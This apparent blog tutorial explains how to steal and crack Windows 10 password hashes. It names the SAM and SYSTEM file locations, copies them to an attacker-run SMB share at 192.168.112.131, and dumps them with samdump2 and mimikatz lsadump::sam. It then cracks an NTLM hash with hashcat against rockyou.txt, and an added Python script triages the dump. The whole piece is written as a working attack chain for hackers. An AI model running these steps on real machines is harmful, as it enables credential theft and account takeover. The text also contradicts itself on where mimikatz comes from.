For a hacker, wouldn't it be ideal if all the Windows usernames and passwords resided in one location to then be analysed? Well, that is how Windows servers are set up. Technically there are two files (one containing the hashes and one containing the key), but if you have both of these files, you have the keys to the kingdom. Below is a quick review of how to extract the passwords from Windows 10 if you have access to these two files.

All the user passwords for the Windows server are hashed and stored within a file called the Security Account Manager (SAM). The hashes are encrypted with a key that can be found in a file named SYSTEM. If you are able to read both the SAM and SYSTEM files, you can extract the hashes; you need both files to get at the account information directly. Windows is clever in the sense that these files are locked while Windows is running, though copies of them may exist because they were duplicated, or simply left over from an OS patch upgrade. Regardless of the scenario, the live SAM and SYSTEM files are located within the following directory:

C:\Windows\System32\config

However, these files are locked while Windows is running. Alternatively, backups of the files may exist in the following directories:

C:\Windows\Repair

or

C:\Windows\System32\config\RegBack

If you have access to these two files, you can grab them from the Windows server onto Kali and then start the password extraction.

Off Windows, onto Kali via SMBServer

You can copy the files from Windows to Kali and then run samdump2 against them. To do this, set up smbserver on Kali to receive the files. The quick video linked below shows how to initially set up Kali with smbserver; there are a few gotchas regarding the 2021 image setup, so the video is useful.

Ensure smbserver is set up and listening on your Kali box, as shown below:

Windows gives little explanation when copy reports 0 file(s) copied. The screenshot below shows the difference between smbserver running and not running, even though the copy command is correct in both cases:


copy C:\Windows\repair\SAM \\192.168.112.131\tools\

copy C:\Windows\repair\SYSTEM \\192.168.112.131\tools\

Using samdump2

Now for the easy part, as samdump2 comes out of the box with Kali Linux (at /usr/bin/samdump2). Execute samdump2 with the two files as parameters, SYSTEM first, like so:

# samdump2 /home/kali/SYSTEM /home/kali/SAM


LM and NTLM

Each account comes with two hash values. The first is for LM authentication, which is now deprecated and only populated with a value so that the output format stays constant. The second is the NTLM hash. If the NTLM value starts with 31d6, the account is either disabled or has no password set, and these accounts can be ignored. In newer versions of samdump2 this hard work has been done for you: the username gains an additional column, *disabled*, on the left of the results.

One item to note is that all the values here are 31d6cfe0d16ae931b73c59d7e0c089c0. Typically, anything starting with 31d6 indicates that the account is disabled. You might assume the SYSTEM and SAM files are worthless, though Windows 10 changed the format in which the hashes are stored, and therefore many similar tools are redundant. There is, however, an alternative tool, called mimikatz, that comes out of the box with Kali and can accommodate the new hashing algorithm.
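As an added example that is not part of the original post, the following Python triages samdump2's pwdump-style output using the rule above: it parses each user:RID:LM:NT::: line, honours the *disabled* marker that newer samdump2 prints, and flags the empty NT hash (31d6cfe0d16ae931b73c59d7e0c089c0) as well as the empty LM hash (aad3b435b51404eeaad3b435b51404ee, a well-known constant the post does not show). The sample lines are constructed; the admin NT hash is the one quoted later in the post.

```python
import re

# Hashes of the empty string as printed by samdump2 (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line: [*disabled* ]user:RID:LMhash:NThash:::
PWDUMP_RE = re.compile(
    r"^(?P<flag>\*disabled\*\s+)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample output (not a real dump); the admin NT hash is the one
# quoted in this post's hashcat command.
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
"""

def parse_pwdump(text):
    """Return one dict per account; reject any line that is not pwdump format."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = PWDUMP_RE.match(line)
        if m is None:
            raise ValueError(f"not a pwdump line: {line!r}")
        accounts.append({"user": m["user"], "rid": int(m["rid"]),
                         "lm": m["lm"].lower(), "nt": m["nt"].lower(),
                         "disabled": m["flag"] is not None})
    return accounts

def classify(acct):
    """Why an entry can be skipped, or 'nt-hash' if it holds a real NT hash."""
    if acct["disabled"]:
        return "disabled"          # newer samdump2 marks these itself
    if acct["nt"] == EMPTY_NT:
        return "empty-password"    # NT hash of "": nothing to crack
    if acct["lm"] != EMPTY_LM:
        return "lm-present"        # legacy LM hash still stored
    return "nt-hash"

def triage(text):
    """Map each username in a samdump2 dump to its classification."""
    return {a["user"]: classify(a) for a in parse_pwdump(text)}
```

Running triage(SAMPLE) marks Administrator and Guest as disabled and leaves only admin as an account with a real NT hash.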

Using mimikatz

Downloading this from GitHub and then executing it on the Windows machine allows you to display the NTLM attributes:

mimikatz # lsadump::sam /system:C:\Users\admin\Desktop\passwordExploits\samAndSystem\SYSTEM /sam:C:\Users\admin\Desktop\passwordExploits\samAndSystem\SAM

The NTLM hash is then passed to hashcat with -m 1000 (because 1000 is hashcat's NTLM mode) and run against the rockyou.txt wordlist:

# hashcat -m 1000 --force fc525c9683e8fe067095ba2ddc971889 /usr/share/wordlists/rockyou.txt